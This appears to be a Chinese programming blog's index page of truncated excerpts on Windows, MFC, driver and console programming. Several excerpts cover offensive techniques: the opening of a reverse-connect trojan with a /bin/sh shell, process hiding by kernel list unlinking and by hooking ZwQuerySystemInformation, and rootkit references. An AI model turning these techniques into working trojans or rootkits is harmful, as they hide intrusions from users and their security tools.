BOOL DeleteTree(CString DirName){ //成功：返回TRUE；否则，返回FALSEBOOL Result;Result=PreRemoveDirectory(DirName)      && RemoveDirectory(DirName);return Result;}BOOL PreRemoveDirectory(CString DirName){//成功：返回T

/ CTreeViewDlg message handlers//@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@//º¯Êý¹¦ÄÜ:³õʼ»¯//@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

首先，一台机器可能有不止一个CD-ROM驱动器。现在CD-ROM已经是PC机的标准配置，此外再装个可擦写的光盘驱动，甚至是DVD都是很常见的事情。不管一台机器上装多少个不同的驱动器，如何找到它们呢？    有关驱动器的函数有GetLogicalDrives，GetLogicalDriveStrings和GetDriveType。前两个用来获取逻辑驱动器盘符，GetLogicalDriveStrin

void FindDriverInfo(){CComboBox* Driver=(CComboBox*)GetDlgItem(IDC_DRIVER);DWORD dwNumBytesForDriveStrings;HANDLE hHeap;LPSTR lp;CString strLogdrive;int nNumDrives=0, nDriveNum;dwNumBytesForDriveStrin

第一个反弹木马代码：作者 iceblood代码#include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char *argv[]) {if(

在NT环境下隐藏进程，也就是说在用户不知情的条件下，执行自己的代码的方法有很多种，比如说使用注册表插入DLL，使用Windows挂钩等等。其中比较有代表性的是Jeffrey Richer在《Windows核心编程》中介绍的LoadLibrary方法和罗云彬在《windows环境下32位汇编语言程序设计》中介绍的方法。两种方法的共同特点是：都采用远程线程，让自己的代码作为宿主进程的线程在宿主进程的地

NTSTATUS IrpCreate(IN PUNICODE_STRING Name,IN ACCESS_MASK DesiredAccess,IN ULONG FileAttributes,IN ULONG ShareAccess,IN ULONG CreateDisposition,IN ULONG CreateOptions,IN PDEVICE_OBJECT DeviceObject,IN

发布原因，主要是因为国内某安全软件长期存在的引擎问题，希望本文可以让其做实质性更新。安全软件，要给用户，使用者以安全，而不是麻烦。具体引擎问题表现，是扫描文件，创建一拷贝，再扫描这个拷贝的文件。即使象AVP这种杀壳专家，见到壳也不会通通脱掉。也有很大的可能直接在壳中提取病毒定义。源代码如下，有部分删节，因本文并不是让所有的人都来写扫描器，且此引擎亦不再使用。 const  cBuf_S

作者：程序员客栈提交者：eastvc 发布日期：2003-10-19 20:01:54原文出处：http://www.driverdevelop.com/经常有人问及如何安装DDK,如何编译第一个设备驱动程序以及如何消除掉编译驱动程序 时出现的大量错误信息.  其实, DDK的安装和驱动程序的编译是很简单的. 为了编译驱动程 序, 你必须首先打开一个DOS窗口, 并正确设置好所需的全部环境变量

通常编译驱动都是使用DDK中的Build.exe，由于它是命令行程序，使用很不方便。其实在VC++中也可以编译驱动，而且设置的方法也有很多，下面是其中一种，我想也是最常用的。一般使用VC++编译驱动，可以建立一个Win32 (x86) Application工程，然后将所有Windows程序中的编译开关都删除，最后添加编译驱动的开关就行了。"$(ddkroot)/inc/ddk"和"$(ddkro

HOOK API是一个永恒的话题，如果没有HOOK，许多技术将很难实现，也许根本不能实现。这里所说的API，是广义上的API，它包括DOS下的中断，WINDOWS里的API、中断服务、IFS和NDIS过滤等。比如大家熟悉的即时翻译软件，就是靠HOOK TextOut()或ExtTextOut()这两个函数实现的，在操作系统用这两个函数输出文本之前，就把相应的英文替换成中文而达到即时翻译；IFS和N

List of useful security librariesI was asked last week for a list of "drop-in-and-more-secure" replacements, created at Microsoft, for C/C++ functions and constructs. So heres a list:IntSaf

// 作者：周星星 日期：2004-12-26 13:00// 这是个俄罗斯方块程序，还没有测试，暂定为alpha版本，待用户反馈之后再做调整（言下之意这个代码还是很垃圾的）// 因为想证明简单的函数也能做出复杂花哨的程序，所以没有使用GUI、多线程等高级功能，但目前只能在中文windows下运行// 本代码可以随意拷贝，但如想修改请告之在下或笑笑同志，或者全权交给您进行版本控制，这样可以保证只有

服务程序（Service）一般是不能和用户进行交互的，所以他一般是不能显示窗口的。要和用户进行交互（如显示窗口），我们必须打开用户WinSta0和desktop,下面的这段代码就是打开上述两个，并显示一个dialog： BOOL CService

关键字 代理服务器、Socks4、Socks5、Http代理原作者姓名 allfresh 读者评分 3 评分次数 1 正文在网络程序设计过程中，我们经常要与各种类型的代理服务器打交道，比如在企业内部网通过代理去访问Internet网上的服务器等等，一般代理服务器支持几种常见的代理协议标准，如Socks4,Socks5,Http代理，其中Socks5需要用户验证，代理相对复杂。我在查阅RFC

次贴的防止loader的办法中使用了NT中的native API，所以无法在Win9x/ME中使用。利用Win32提供的ToolHelp API，也可以得到一个进程的父进程的PID。Win9x/ME和Win2K/XP都支持ToolHelp API，但WinNT(3.51, 4.0)却不支持。  #include #include #include #include #pragm

摘要: 文本界面的控制台应用程序开发是深入学习C++、掌握交互系统的实现方法的最简单的一种手段。然而，Visual C++的C++专用库却没有TC所支持的文本(字符)屏幕控制函数，为此本系列文章从一般控制步骤、控制台窗口操作、文本(字符)控制、滚动和移动、光标、键盘和鼠标等几个方面讨论控制台窗口界面的编程控制方法。　　在众多C++开发工具中，由于Microsoft本身的独特优势，选用Visual

要做软件时，找个类似的软件参考一下，进步最快。这里是一个开源软件分类列表，分类详尽，可惜我们要用代理访问http://en.wikipedia.org/wiki/List_of_open-source_software_packages内容很多，可以点击进评论中有内容的转载，:)Contents 1 Applied fields 123

一、软件测试概述    软件测试是软件开发过程的重要组成部分，是用来确认一个程序的品质或性能是否符合开发之前所提出的一些要求。软件测试的目的，第一是确认软件的质量，其一方面是确认软件做了你所期望的事情（Do the right thing），另一方面是确认软件以正确的方式来做了这个事件（Do it right）。第二是提供信息，比如提供给开发人员或程序经理的反馈信息，为风险评估所准备的信息。第

IntroductionWe know USB disk should be a removable disk just like floppy disk, and be used more and more widely now. Because, the USB disk is more faster, reliable, and affordable than old floppy

Petzold  第一部分第九章“子视窗控制项”。按钮类别共有10种，分别是：        BS_PUSHBUTTON          BS_DEFPUSHBUTTON      BS_CHECKBOX      BS_AUTOCHECKBOX      BS_RADIOBUTTON      BS_3STATE      BS_AUTO3STATE      BS_GROUPBOX    

winxp sp2 不支持 raw socket 的事情，在这个地方http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2netwk.mspx#XSLTsection127121120120找到了这样一段Restricted traffic over raw socketsDetailed descriptionA ve

无论Outlook XP还是最新的Foxmail 4.0，都只能在HTML格式的电子邮件中嵌入JPG、GIF格式图片，而音色俱佳的Flash动画却只能作为电子邮件附件发送给好友，你可曾感到遗憾？　　经过一番实验探索，我使用Delphi终于实现了将Flash动画（.SWF格式）嵌入到电子邮件正文中发送的功能，Foxmail、Outlook均可以按照HTML格式的邮件查看，而且263、163等免费电子

东欧牛人“圣父”的hxdef(黑客守卫者)重新钩起了我对Delphi的兴趣，“圣父”基乎是全用Basm写成了hxdef。天天都用C/C++，Object Pascal感觉自己怎么也用不熟，昨晚看了一下Object Pascal的Inline ASM，主要是堆栈的安排以及Register和Pascal调用与C的Cdecl及API的Stdcall不太一样，什么引用型变量，指针等在汇编中的内存结构与

在经典的汇编语言教程中，函数调用时堆栈的使用都是着重讲解的问题。如今随着高级语言的越来越完善，单纯使用汇编开发的程序已经不多了。但对函数调用时堆栈动向的了解仍有助于我们明晰程序的执行流程，从而在程序编写和调试的过程中有一个清晰的思路。一．调用约定在Win32中，有关函数的调用主要有两种约定。1．_stdcall        以__stdcall方式调用的函数有以下特征：    •  参数由右至左

http://202.194.11.48/Portal/News/shownews.aspx?PTCTctid=316 Visual.Studio.2005.简体中文版(TS) 2006-2-27 9:36:53

This article was previously published under Q190351On This Page SUMMARY MORE INFORMATION

otkits: Subverting the Windows Kernelhttp://www.amazon.com/exec/obidos/redirect?link_code=ur2&camp=1789&tag=rootkit-20&creative=9325&path=tg/detail/-/0321294319/qid=1117165919/sr=8-6/ref=sr_8_xs_ap_i6

打开物理内存->找到活动进程链表->摘除自己这个用去动作很简单：#define DEBUGMSG#include #define DWORD ULONG#define NT_DEVICE_NAME          L"//Device//king"#define DOS_DEVICE_NAME         L"//DosDevices//king"void DriverUnloAd(IN P

 头文件：////////////////////////////////////////HideProcess.hBOOL HideProcess();CPP源文件：///////////////////////////////////////////////////////////////////////////////HideProcess.cpp#include#include

Author: peter # Views: 1259 Printer Friendly ...  ForewardSince the introduction of FU, the rootkit world has moved aw

1．  在所有的预处理指令中，#Pragma 指令可能是最复杂的了，它的作用是设定编译器的状态或者是指示编译器完成一些特定的动作。#pragma指令对每个编译器给出了一个方法,在保持与C和C ++语言完全兼容的情况下,给出主机或操作系统专有的特征。依据定义,编译指示是机器或操作系统专有的,且对于每个编译器都是不同的。其格式一般为: #Pragma Para其中Para 为参数，下面来看一些常用

增强Microsoft开发环境下的编辑能力。Visual Assist X具有强大的编辑特色，提高了生产效率，可以完全集成到您的Microsoft开发环境中，升级了您的IDE，在不改变编程习惯的同时就可以感受到Visual Assist X为您带来的好处。  Visual Assist X是一款非常好的Visual Studio .NET 2003、2002插件，支持C/C＋＋，C＃，

近一直在研究rootkit，首先申明我是rootkit的菜鸟哈，也感觉还么有研究得好深。这次我把我练习时写的一个hook 系统 ZwQuerySystemInformation 函数来实现隐藏QQ进程的代码贴上来，也算是为成黑添砖添瓦哦。隐藏了的进程能够被rootkit的检测工具检测出来，但是一般的方法是看不出来的，比如任务管理器，和程序里面列出进程都是看不到的。程序中我已经添加了相关的注释，这里

=========================[ Invisibility on NT boxes ]=========================== How to become unseen on Windows NT ----------------------------------

Author: sinisterEmail: sinister@whitecell.orgHomepage:http://www.whitecell.org Date: 2002-05-08查找进程，目录/文件，注册表等操作系统将最终调用 ZwQueryDirectoryFile，ZwQuerySystemInformation，ZwXXXValueKey 等函数。要想拦截这些函数达到隐藏目的，需

http://blog.vckbase.com/Files/BastEt/testnodll.zip VC2003编译，我想用VC6肯定也能编译通过，不过机器上没装，哪个有空帮我看看在VC6下能达到多少字节？ 原始文章来自:http://blog.youkuaiyun.com/sunwang123456/archive/2005/10/18/508706.aspx#define WIN32_LEAN_AND_

显示EXE，DLL或PDB文件中指定函数的Parameter和local variables信息 //============================================================================// LFVars : A small tool used to display function symbol informaton

论： 1、绝对不可低估开源的力量！我们能由开源学到更多 ... 2、Dexter 抛弃了 BorlandMM，娶了 FastMM，因为 FastMM 勤快（效率更高），会持家（没有而外 DLL 的累赘）... 3、和以往的 Delphi 不同，Delphi 2006 中在 Dll 导出 string、动态数组等不再需要 ShareMem！（因为已经内置了） ＝^0^＝ --------------